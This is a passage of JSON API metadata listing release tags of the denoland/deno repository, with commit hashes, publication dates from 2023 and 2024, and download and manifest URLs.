5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms